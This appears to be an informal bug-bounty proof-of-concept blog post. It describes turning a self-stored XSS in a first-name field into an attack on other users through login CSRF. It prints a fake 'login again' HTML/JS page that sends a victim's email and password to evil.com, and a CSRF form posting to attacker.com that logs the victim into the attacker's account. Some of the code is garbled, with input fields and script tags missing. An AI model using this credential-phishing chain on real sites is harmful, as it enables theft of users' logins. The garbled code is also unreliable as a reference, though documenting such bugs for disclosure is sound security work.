Hi guy I hope you all are fine this POC is all about how I convert the Self XSS To Evil XSS so let assume the site PRIVATE.COM
The first step simply sign-up and login to the account & start playing with the change account details functionality after some time I find out that the first name field is vulnerable to xss but the problem is this is self stored xss so I need to convert this xss to exploit other users I check the 1st method through CSRF but there is a CSRF token in the account update functionality so this method fail & then I remember GEEK BOY POC.
So simple created the html + js code to steal email & pass of victim.
<!DOCTYPE html>
<html>
<head>
<title>XSS</title>
</head>
<body><center>
Something Went Wrong Please Login Again
Password</div>
<button class=”action-button btn btn-primary login-button” buttontype=”login” type=”submit” onclick=”myFunction()”>Login</button>
</div>
function myFunction() {
var x = document.getElementById(“Vemail”).value;
var y = document.getElementById(“Vpass”).value;
var pwd = x + “:” + y;
alert(pwd);
window.location = “https://evil.com/” + pwd;
}</body>
</html>
This is a simple html code with 2 input fields with 1 button asking for Email and Password & the JS code simply get the input field value & send it to attacker server and upload the code the web host.
Simply use I frame to load the code from web host.
This is how i look like.
<html><body><form action="https://attacker.com/login/submit" method="POST"><input type="hidden" name="email" value="email@gmail.com" /><input type="hidden" name="password" value="password" /><input type="submit" value="Submit request" /></form></body></html>
This is simply make victim to login in my account without knowing him & when he login in my account he see the msg Something Went Wrong with input fields & try to login when he try the JS code simply get the email & pass victim enter and send it to attacker server
I hope you like it 🙂
./Logout
xss code 